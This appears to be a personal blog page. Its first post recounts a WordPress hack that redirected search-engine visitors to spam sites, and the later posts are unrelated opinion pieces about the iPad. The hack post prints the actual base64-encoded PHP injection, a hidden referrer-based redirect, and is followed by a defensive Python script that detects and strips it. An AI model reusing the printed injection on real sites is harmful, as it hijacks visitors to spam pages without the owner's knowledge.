WordPress + Google Search Result links redirected/hijacked/hacked

A couple weeks ago it was brought to my attention that when googling myself and then clicking on the Google search links, users were redirected to various spam websites instead of the actual website they wanted to visit. Since I don’t google myself to visit my personal & freelance websites (I visit them directly by typing the URL into the address bar), I was entirely unaware of this problem.

I started troubleshooting this problem by googling the keywords to all the websites I host. For every WordPress website that I hosted, the google search links were hijacked and redirected to spam sites. For any static HTML pages that I hosted, the google search links took me to the correct website.

This told me that every single one of my WordPress websites had been hacked and infected with a script. In fact, when troubleshooting, I discovered that not only was it the root level (home page) of the site, but all the sitelinks (the sub links shown underneath the main search result) had been infected as well. To me, this meant that the “virus” was at least in the header.php file of the WP install.

Coincidentally, I had just made the decision to switch hosting providers. I have been with BlueHost since June 2009 and honestly have never had any negative experiences. Within the past year, my work had a hugely negative experience with BlueHost. Long story short, all of our websites hosted with them vanished into the aether. This included all of our WordPress installs and our web team’s wiki. Their response to our trouble ticket was something along the lines of something blew up, nothing we can do, surely you understand. Fortunately, we do not understand and we do understand that rolling us to a backup is a reasonable expectation that they failed to see or execute. This experience terrifies me since I provide hosting for freelance clients. If their websites vanished one day with NO BACKUP, well… I’d be f’ed. As a consequence of this experience, I waited until my BlueHost hosting plan was close to expiration and then bought new hosting with DreamHost (recommended to me by a few coworkers).

Back to the hacked WordPress sites. I deduced that at the very least my header.php files were hacked, and they likely became that way because of a lack of security with my hosting provider as well as very slightly out of date WordPress installations. I needed to check my WP files on the server and then migrate all my domains and hosting off of BlueHost.

Saturday morning I checked my WP files. I began by checking index.php at the root level of the install and then in the wp-content subdirectories. EVERY SINGLE opening PHP tag was followed by this nastiness:

<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9")); ?>

Then, I checked my header.php file. EVERY SINGLE PHP tag was followed with this code. Literally every time my WP theme opens PHP to use a WP template tag, nasty infection virus code. Literally, metadata, keywords, title, everything, everything.

Obviously I’d been googling to troubleshoot this problem. All the google results were forums, blogs, discussion groups, etc. talking about Norton, McAfee, Spider-something, and all other anti-virus software. Well it was obvious to me that the problem was not on my machine (I tested on my work Mac Pro, my home MacBook Pro, and my iPad) but on my server area. My wise husband said, “Hun, put ‘Mac’ on the end of your search.” Goodness sakes that was silly of me. Bam, I throw ‘Mac’ on the end of my search and all of a sudden I see the forums saying that it’s a server problem. That brilliant idea spurred another brilliant idea. I google the nasty infection code (shown above). Looky what I found:
Another poor soul whose WordPress site got hacked. He explains his solution to the problem here.

The bare bones “non-technical” solution that I thought of is to export your WP data to xml then re-import the data on a fresh WordPress installation. The probability of this solution working was confirmed by the link above. A few caveats or things to keep in mind…

  • Change hosting providers, and if you can afford it, opt for private hosting (shared hosting is the cheapest and it’s where they put you on a box with other people). If it happened to you once, it will happen to you again. Hubby suggested that it could be someone else that’s on the same box as me infecting everyone on the box. So even if I deleted my WP installs & did a fresh install, it is possible that the files would get hacked all over again within minutes.
  • Change your theme. All the installed themes are going to be infected too. Luckily I was running a child theme of 2011 and my child theme only had two php files with a small amount of customization. If you must keep the same theme, which I felt like I needed to, remove the virus code from the appropriate files, download locally, and zip up so you have a clean version of the theme you’re running.

The highly technical solution is to run a command line script on the server that finds all the files that have the virus code in them and duplicates all the files but without that code. Then it kills all the files that have the code. My command line juju is severely lacking and I’m terrified of that black box screen. This solution was mentioned in the two posts that guided me (linked above) and the actual script and nitty gritty details can be found here: http://tech.sarathdr.com/featured/wordpress-hacked-redirect-to-gigop-americanunfinished-com
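A sketch of the scripted cleanup described above, added here as an example; it is not the script from the linked post. The function names, the `spam.example` sample payload and the separate output directory are assumptions; unlike the approach described, it leaves the infected originals in place for inspection and only decodes the payload, never runs it.

```python
import base64
import re
from pathlib import Path

# The injection described in the post: eval(base64_decode("...")) placed directly
# after an opening PHP tag. Group 1 = the tag, group 2 = the base64 payload.
INJECTION = re.compile(
    r'(<\?php\s*)eval\s*\(\s*base64_decode\s*\(\s*"([A-Za-z0-9+/=\s]+)"\s*\)\s*\)\s*;?\s*'
)
# Redirect target inside a decoded payload, e.g. header("Location: http://...").
LOCATION = re.compile(r'header\s*\(\s*["\']Location:\s*([^"\']+)', re.I)


def analyze(php_source):
    """Return (cleaned_source, redirect_targets, hits); payloads are decoded, never run."""
    targets, hits = [], 0
    def strip(match):
        nonlocal hits
        try:
            decoded = base64.b64decode(match.group(2)).decode("latin-1")
        except ValueError:
            return match.group(0)  # not valid base64: leave it for manual review
        hits += 1
        targets.extend(t.strip() for t in LOCATION.findall(decoded))
        return match.group(1)  # keep the opening tag, drop the injected statement

    return INJECTION.sub(strip, php_source), targets, hits


def clean_tree(src, dst):
    """Write cleaned copies of infected .php files under dst; originals stay untouched."""
    report = {}
    for path in sorted(Path(src).rglob("*.php")):
        cleaned, targets, hits = analyze(path.read_text(encoding="latin-1"))
        if hits:
            out = Path(dst) / path.relative_to(src)
            out.parent.mkdir(parents=True, exist_ok=True)
            out.write_text(cleaned, encoding="latin-1")
            report[str(path.relative_to(src))] = {"hits": hits, "targets": sorted(set(targets))}
    return report


# Constructed sample (not the payload from the post): a harmless stand-in redirect.
PAYLOAD_B64 = base64.b64encode(b'header("Location: http://spam.example/"); exit();').decode()
SAMPLE = (f'<?php eval(base64_decode("{PAYLOAD_B64}")); ?>\n'
          f'<title><?php eval(base64_decode("{PAYLOAD_B64}")); wp_title(); ?></title>\n')

if __name__ == "__main__":
    print(analyze(SAMPLE))
```

The report lists each infected file with the redirect targets found in its decoded payload, which is also a quick way to confirm that every hit is the same injection before trusting the cleaned copies.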

I am ECSTATIC to report that downloading the XML export, downloading my child theme files, editing and then zipping my clean child theme files, changing hosting providers, doing a fresh WordPress install, uploading my XML, and reinstalling my clean child theme left me with a nearly perfect migration of my old website.

The only problem that I experienced is that some of my post images did not migrate over. What I did to work around that was download my entire


folder from my old site and then upload the entire


directory on my new server space. The image URLs within posts no longer returned 404s, woot woot! The only problem is that none of my [gallery] shortcodes work. I thought it was because the images are not linked to the post gallery, but my entire media library is empty. Frankly… I said eff it. At least all my data is here, my single images are here, my google search links take users to me, if I lose a few galleries… well that is a price that I am willing to pay.


I was very worried this morning that I was going to fall head over heels with the new iPad that was coming out today.

I just got my iPad2 last August and I didn’t want to feel behind the game already.

From what I can tell, I’m really not missing out. Not to say that anyone else isn’t, but for how I use my iPad, I definitely don’t need the Retina display or the beefed up camera. And I’m 99% sure it’s packaged with all the same apps (messages + reminders, I don’t think I have this?), so I’m good on that too.

I must say though… Apple invested in some really nice hand models for their marketing imagery.


I might be trumped

So I have relentlessly hated on the iPad because of the lack of a USB drive. I think the announcement of iCloud has bested me. I’ll need to find out more, but it seems to me that if you have iCloud and can push all your data to all your devices… is a USB drive a thing of the past?

To USB or Not To USB? Part 2

iPad2 is completely sold out online and in stores. In New York, a woman sold her physical spot in line outside the Apple store for $900 (http://bit.ly/hWxKDv). She was first in line, but still… Wow. Other customers are waiting almost a month to receive theirs (http://bit.ly/e6yTYM).

I still can’t find any firm information on whether or not it has a USB port. I know that there is a front and back camera, it’s faster and slimmer, the resolution hasn’t improved, and there is no SD slot. What about USB?

I found this, and it’s the best info on USB that I’ve found. It compares the Motorola Xoom and the iPad 2. It says that the Xoom has “many unique features” that are “specifically not available” on iPad 2 (Flash, 4G, SD slot, USB port, and built-in HDMI). I’ve re-read this article several times, and I can’t tell if these “unique features” are available on iPad 2 but don’t come in the standard config, OR if they’re just not available at all. Which seems to be the case because I know you can’t config an iPad to play Flash.

And this one is incredibly confusing. In the Battery Life section, it mentions that you can try and charge your iPad 2 via USB on your computer or laptop, but then later on says that a USB port is “one of the most wished-for features” by users.


Does anyone know, for sure, if there is a USB port on the iPad2??

To USB or Not to USB?

If you took a look at the Apple start page today, you should notice they’re plugging the brand spankin’ new iPad 2. It’s got the camera that everyone knew it needed, but what about a USB port?

According to them:

Once you pick up iPad 2, it’ll be hard to put down. That’s the idea behind the all-new design. It’s 33 percent thinner and up to 15 percent lighter, so it feels even more comfortable in your hands.

This sentence is followed by a superscript 2 (footnote):

Actual size and weight vary by configuration and manufacturing process.

If it’s 33% thinner, how will they fit a USB port? The pictures don’t show a USB port, but that doesn’t mean anything.

Maybe you’ll be able to order a 33% thicker iPad and configure it with USB. Doesn’t sound too bad to me.

For more info on iPad 2, check here.

The new iPad

I know that everyone has their own opinion about what Apple did right or wrong concerning the 2010 release of the iPad. I’ve read some reviews, I’ve looked at the product on the Apple website, and I’ve held my tongue. For long enough. I will finally voice my personal opinion.

1.) It’s more along the lines of a phone than a computer. The interface is the same as the iPhone, not the iMac or the Mac Pro or any of the computer lines. I wanted a tablet computer, not a tablet phone. I do take into consideration that the lines between phone and computer have become more and more blurred, but it is undeniable that the iPad is closer to a phone than a computer. Which brings me to my second point.

2.) 64GB is just not enough. And I realize that 64GB is the largest hard drive it comes with at the moment, but I still say it’s not enough. Sure, that’s a few gigs more than what we have at home on our iBook, but our iBook is also 4 or 5 years old and runs slow. But I suppose that ties in with my first point. 64GB is a lot for a phone. It’s not a lot for a computer.

3.) To me, it just screams first generation. I think that by the 3rd or 4th, Mark and I will be in line to buy ours — but right now, it almost seems like a waste of money. Good idea, maybe not excellently executed.

What I wished for was a tablet computer that could run all programs of the Adobe CS4 Web Premium software at the same time, multiple browsers open, with iPhoto & iTunes running. And no lag. That would be a huge feat that graphic designers and artists and all sorts of other people could use and appreciate.

Do I ask for too much?